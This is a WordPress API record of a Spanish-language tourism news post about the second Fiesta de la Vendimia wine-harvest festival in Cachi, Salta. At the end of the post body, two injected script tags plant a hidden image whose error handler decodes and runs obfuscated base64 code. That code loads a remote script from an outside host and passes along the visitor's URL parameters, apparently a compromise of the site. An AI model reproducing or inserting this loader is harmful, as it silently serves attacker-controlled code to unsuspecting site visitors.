{"id":3917,"date":"2024-04-08T18:54:59","date_gmt":"2024-04-08T21:54:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3917"},"modified":"2025-08-13T23:57:21","modified_gmt":"2025-08-14T02:57:21","slug":"el-fin-de-semana-se-podra-disfrutar-de-la-segunda-fiesta-de-la-vendimia-en-cachi","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3917","title":{"rendered":"El fin de semana se podr\u00e1 disfrutar de la Segunda Fiesta de la Vendimia en Cachi"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-c816845d941ec359b4ca8176fb116b2e\" style=\"background-color:#78065f\"><em>Visitantes podr\u00e1n participar de distintas actividades que incluyen la bendici\u00f3n de frutos, presentaciones de bodegas y viticultores, espect\u00e1culos art\u00edsticos y degustaciones de vinos. Adem\u00e1s hay promociones y eventos especiales en alojamientos y espacios gastron\u00f3micos adheridos.<\/em><\/h4>\n\n\n\n<p>La 2da edici\u00f3n de la Fiesta de la Vendimia, una celebraci\u00f3n anual que honra la cosecha de uvas y la producci\u00f3n de vinos de altura, se realizar\u00e1 los d\u00edas 13 y 14 de abril en el municipio de Cachi.<\/p>\n\n\n\n<p>El acto central ser\u00e1 el s\u00e1bado 13 a partir de las 18 en la Plaza Seca de la localidad, donde se llevar\u00e1 adelante la bendici\u00f3n de frutos y &nbsp;presentaci\u00f3n de bodegas y viticultores. Se podr\u00e1 disfrutar tambi\u00e9n de espect\u00e1culos art\u00edsticos y degustaci\u00f3n de vinos.<\/p>\n\n\n\n<p>Adem\u00e1s el domingo 14 las bodegas de la zona abrir\u00e1n sus puertas con distintas actividades y propuestas preparadas especialmente para celebrar la Vendimia.<\/p>\n\n\n\n<p>Cabe destacar que en el marco de este evento, los visitantes a la Fiesta podr\u00e1n acceder a descuentos especiales en los hoteles adheridos, un 20% para las noches del 12 y 13 de abril y late check out para el d\u00eda 14.<\/p>\n\n\n\n<p>Asimismo, espacios gastron\u00f3micos adheridos ofrecer\u00e1n \u201cMaridaje del Alto Valle\u201d, una propuesta para disfrutar de comida regional acompa\u00f1ada de vinos de gran altura.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-fin-de-semana-se-podra-disfrutar-de-la-segunda-fiesta-de-la-vendimia-en-cachi-94962\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Visitantes podr\u00e1n participar de distintas actividades que incluyen la bendici\u00f3n de frutos, presentaciones de bodegas y viticultores, espect\u00e1culos art\u00edsticos y degustaciones de vinos. Adem\u00e1s hay promociones y eventos especiales en alojamientos y espacios gastron\u00f3micos adheridos. La 2da edici\u00f3n de la Fiesta de la Vendimia, una celebraci\u00f3n anual que honra la cosecha de uvas y la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3918,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,18],"tags":[],"class_list":{"0":"post-3917","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3917"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3917"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3917\/revisions"}],"predecessor-version":[{"id":6806,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3917\/revisions\/6806"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3918"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3917"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3917"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3917"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}